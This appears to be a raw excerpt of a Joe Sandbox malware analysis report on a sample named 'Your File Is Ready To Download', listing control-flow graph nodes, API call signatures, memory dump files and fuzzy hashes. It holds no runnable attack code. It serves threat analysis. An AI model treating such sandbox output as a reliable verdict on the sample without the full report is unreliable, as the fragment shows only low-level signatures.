1400388a1-1400388a3 4612->4617 4620 140033600-140033604 4613->4620 4623 1400384fd 4616->4623 4617->4562 4617->4571 4618->4603 4620->4623 4627 14003221f-14003223d call 140031f30 4621->4627 4628 1400321ed 4621->4628 4625 14003235c-140032363 4622->4625 4626 1400322b9-1400322c0 4622->4626 4624 140038502 4623->4624 4624->4568 4625->4571 4630 140032369 4625->4630 4631 1400322c2 4626->4631 4632 1400322ff-14003231d call 140031f30 4626->4632 4639 140032242-140032245 4627->4639 4633 1400321f0-14003221b call 140031f30 4628->4633 4630->4568 4635 1400322d0-1400322fb call 140031f30 4631->4635 4642 140032322-140032329 4632->4642 4644 14003221d 4633->4644 4650 1400322fd 4635->4650 4639->4568 4645 14003224b-140032252 4639->4645 4648 14003851b-140038522 4642->4648 4649 14003232f-140032332 4642->4649 4644->4639 4646 140032258-14003225b 4645->4646 4647 140038527-140038530 4645->4647 4646->4647 4651 140032261-140032264 4646->4651 4647->4562 4648->4571 4649->4648 4652 140032338-14003233b 4649->4652 4650->4642 4653 140032281-140032292 4651->4653 4654 140032266-14003226e 4651->4654 4652->4620 4655 140032341-140032349 4652->4655 4653->4569 4659 140032298-1400322a1 4653->4659 4654->4648 4656 140032274-14003227c 4654->4656 4657 140038535-140038541 4655->4657 4658 14003234f-140032357 4655->4658 4656->4568 4657->4562 4658->4624 4659->4569
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
                                                                                                                                                                                                                          • String ID: %s\%s$ahk_default
                                                                                                                                                                                                                          • API String ID: 1623861271-75935552
                                                                                                                                                                                                                          • Opcode ID: fc73a900c8346e95abc61a0e86a74cd7a13adcc0e7ab337c42d9fa0be3a60fa4
                                                                                                                                                                                                                          • Instruction ID: 048c2e1420f72b08f6da745a0fd0e92c76516b67efe5bb1984d62529e4ea00e7
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fc73a900c8346e95abc61a0e86a74cd7a13adcc0e7ab337c42d9fa0be3a60fa4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8DB13771604B4086FB6B8B27A8403EA77A1F78DBD4F544126FB9947AF5DB38C885C740
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _errno_invalid_parameter_noinfo$_wsopen_s
                                                                                                                                                                                                                          • String ID: =$UNICODE$UTF-16LE$UTF-8$ccs
                                                                                                                                                                                                                          • API String ID: 2449612375-31882262
                                                                                                                                                                                                                          • Opcode ID: aa7a12e72c13116635aa1623b80d006e0e346e78ba8ba9d0c45dd25e91760610
                                                                                                                                                                                                                          • Instruction ID: 57a6b2f1bf53cd05b3f187f2342c899ece12a22dbe3ce9a5bad801dbc9e3026f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: aa7a12e72c13116635aa1623b80d006e0e346e78ba8ba9d0c45dd25e91760610
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 66712D76A04240A1FB774E27A8107FE2691AFDCBD4F294111FF0653AF4DE39CA838261
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • malloc.LIBCMT ref: 00000001400CA491
                                                                                                                                                                                                                            • Part of subcall function 00000001400C8F74: _FF_MSGBANNER.LIBCMT ref: 00000001400C8FA4
                                                                                                                                                                                                                            • Part of subcall function 00000001400C8F74: RtlAllocateHeap.NTDLL(?,?,00000000,00000001400CF264,?,?,00000000,00000001400CDBCD,?,?,?,00000001400CDC77,?,?,00000000,00000001400CD065), ref: 00000001400C8FC9
                                                                                                                                                                                                                            • Part of subcall function 00000001400C8F74: _callnewh.LIBCMT ref: 00000001400C8FE2
                                                                                                                                                                                                                            • Part of subcall function 00000001400C8F74: _errno.LIBCMT ref: 00000001400C8FED
                                                                                                                                                                                                                            • Part of subcall function 00000001400C8F74: _errno.LIBCMT ref: 00000001400C8FF8
                                                                                                                                                                                                                          • _errno.LIBCMT ref: 00000001400CA512
                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,00000020,00000001400CF368,?,?,00000000,00000001400C9B3B,?,?,?,00000001400C9BA9), ref: 00000001400CA51A
                                                                                                                                                                                                                          • _errno.LIBCMT ref: 00000001400CA52B
                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,00000020,00000001400CF368,?,?,00000000,00000001400C9B3B,?,?,?,00000001400C9BA9), ref: 00000001400CA533
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _errno$ErrorLast$AllocateHeap_callnewhmalloc
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2313257140-0
                                                                                                                                                                                                                          • Opcode ID: df69ee0ac742230fd0f5d7fba57e7025a48f7b21153ff07a80e1cce079a02a27
                                                                                                                                                                                                                          • Instruction ID: 5d4adb930a3fe504eaf07c5d5ce1c9aea23c8394e19cf97002ba77b85ecb821d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: df69ee0ac742230fd0f5d7fba57e7025a48f7b21153ff07a80e1cce079a02a27
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6E21937060CB4185FE5FAB23A4043DD72915B8EBE8F048635BB2B473F6EA3CC4419211
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ClipboardCloseCountGlobalMessagePeekTickUnlock
                                                                                                                                                                                                                          • String ID: Jumps cannot exit a FINALLY block.
                                                                                                                                                                                                                          • API String ID: 1792675829-672026804
                                                                                                                                                                                                                          • Opcode ID: 41e7c0198bf41557c356dafb56d4c7e000fc85092e23f3702e4a8e943bcda5df
                                                                                                                                                                                                                          • Instruction ID: acd322ca1d214134ac5d7f649de08a70bb7a93da2d57ee0a30aea2ec5953ced4
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 41e7c0198bf41557c356dafb56d4c7e000fc85092e23f3702e4a8e943bcda5df
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A9024936604B408AFB6B8B26E8943EA77A1F74DBD4F544126EF4947BB5DB38D881C700
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlockmalloc
                                                                                                                                                                                                                          • String ID: Out of memory.
                                                                                                                                                                                                                          • API String ID: 425479435-4087320997
                                                                                                                                                                                                                          • Opcode ID: f814e87adf314a6b31eb7cef9c6a33aed5fb67d2c8ac3dfd047589991c6e8d9d
                                                                                                                                                                                                                          • Instruction ID: 066eb817c3b70d7be61ae7bb2b88a7c2218743c3ee24c41251c2c0eb0bcbb7e8
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f814e87adf314a6b31eb7cef9c6a33aed5fb67d2c8ac3dfd047589991c6e8d9d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BFC13932604B408AEB6B8B26E8803EA77A1F78DBD4F544116EF5A47BF5DB38D485C700
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock_errno_invalid_parameter_noinfo
                                                                                                                                                                                                                          • String ID: CSV
                                                                                                                                                                                                                          • API String ID: 130734711-2651001053
                                                                                                                                                                                                                          • Opcode ID: 572362767ad768163867fa68cd7a9e50fc59bdb1ac0e55caaa0b24eb0c1dbfb6
                                                                                                                                                                                                                          • Instruction ID: d9f78cd69f3e77be8d0fec39935b13639e45971fedc057a2c93a66f3b9424bab
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 572362767ad768163867fa68cd7a9e50fc59bdb1ac0e55caaa0b24eb0c1dbfb6
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 03B11972604B448AEB6B8B27E8403DA77A1F78DBD4F504116EB5987BF5DB38D881C740
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock_errno_invalid_parameter_noinfo
                                                                                                                                                                                                                          • String ID: wait
                                                                                                                                                                                                                          • API String ID: 130734711-2112783333
                                                                                                                                                                                                                          • Opcode ID: 7c4ed165d9e2ba37012e234b23c9867010eebace0702a350253cd31f9b522e7d
                                                                                                                                                                                                                          • Instruction ID: cf1d5aa5b94b8c21c0170df4a327b226c7bfbf8668e7474b45d94d604f431d61
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7c4ed165d9e2ba37012e234b23c9867010eebace0702a350253cd31f9b522e7d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F1914631604B4086FB6B8B27E8447EA77A2A78DBD4F544116EB598BAF5DB38C885C700
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ModuleNameOpenProcess$BaseCloseDeviceFileHandleQuery
                                                                                                                                                                                                                          • String ID: :
                                                                                                                                                                                                                          • API String ID: 1931077953-336475711
                                                                                                                                                                                                                          • Opcode ID: 573a37ad16254d65a57e21730c3533045b0e8a963b408c0b4df3915bd6594c49
                                                                                                                                                                                                                          • Instruction ID: 22f51d6e5974e33ba1858768ee294a42fa7c76c1007ef709756bf7c5cb430c9d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 573a37ad16254d65a57e21730c3533045b0e8a963b408c0b4df3915bd6594c49
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B541BE76305B8181EB76AB23A8043EA6391FB8CBD5F484225AF59477A8EF3CC445C764
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ClipboardCloseCountGlobalInfoTickUnlock
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3668674636-0
                                                                                                                                                                                                                          • Opcode ID: d919db4b3003787f4fd321d3ed34bff5e1cc9ebfae758f0bf38b202e11dd4bd0
                                                                                                                                                                                                                          • Instruction ID: 010424c8725794da4d9d843b7715fc1e3d34d848acf92ec9fef2cc870f8aac1c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d919db4b3003787f4fd321d3ed34bff5e1cc9ebfae758f0bf38b202e11dd4bd0
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FBD14D32601B8089EB768F26E8407DA77A2F74DB94F504216EB594BBF5DB38C585C700
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseCountTick$ClipboardGlobalMessagePeekUnlock
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4107439908-0
                                                                                                                                                                                                                          • Opcode ID: 0f4eacce32dbb7fabd4fa376f7d557669b0d157d38553d8343a4a07b158c1fcb
                                                                                                                                                                                                                          • Instruction ID: f644155ad8b0ff2c6bb41787198a4f16e305ea69178ea5da921999b77e6d4863
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0f4eacce32dbb7fabd4fa376f7d557669b0d157d38553d8343a4a07b158c1fcb
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3EB14C32605B848AEB6B8B27E8803DA77A1F78DBD4F504116EF5947BB5DB38C881C700
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Close$CountTick$ClipboardCreateErrorGlobalLastMessagePeekUnlock
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2674141723-0
                                                                                                                                                                                                                          • Opcode ID: 3cbbc759a658de586b3d9575b0f8f4a01f477f5facff7aebc56bdd8a9801fe21
                                                                                                                                                                                                                          • Instruction ID: af8cba61bfda31093be1265673fdc127feffaa00a6ee02027973cf77dae56663
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3cbbc759a658de586b3d9575b0f8f4a01f477f5facff7aebc56bdd8a9801fe21
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 99B13971604B4086FB6B8B27A8443EA77A2F78DBD4F544116EF9947AF9DB38C885C700
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseCountTick$ClipboardGlobalMessagePeekUnlock
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4107439908-0
                                                                                                                                                                                                                          • Opcode ID: 8f6ab087895ee3c05e0ec830718a5b746441a02ff7311cda8f0839cd1fe797df
                                                                                                                                                                                                                          • Instruction ID: 5decb646e76f49f065ce2617e64a23d77cc80f421ff3e23c34fd2cff9f42f85e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8f6ab087895ee3c05e0ec830718a5b746441a02ff7311cda8f0839cd1fe797df
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B4A15871604B4086FB6B8B27A8443EA77A2F78DBD4F544116EF5947AF5DB38C881C700
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CountTick$ClipboardCloseFileGlobalMessageMovePeekUnlock
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1818255640-0
                                                                                                                                                                                                                          • Opcode ID: fc4132aee4dbab13f23e380e22ac67cc336da6469f6ce733df4ea00b5c8bfd6f
                                                                                                                                                                                                                          • Instruction ID: 340df088fe35520b7c01f37ad8eb0e8363d8ae234b43410862286bb96c324202
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fc4132aee4dbab13f23e380e22ac67cc336da6469f6ce733df4ea00b5c8bfd6f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B5914831604B4086FB6B8B27A8943EA77A2B78DBD4F544116EB5947AF6DB38C885C700
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

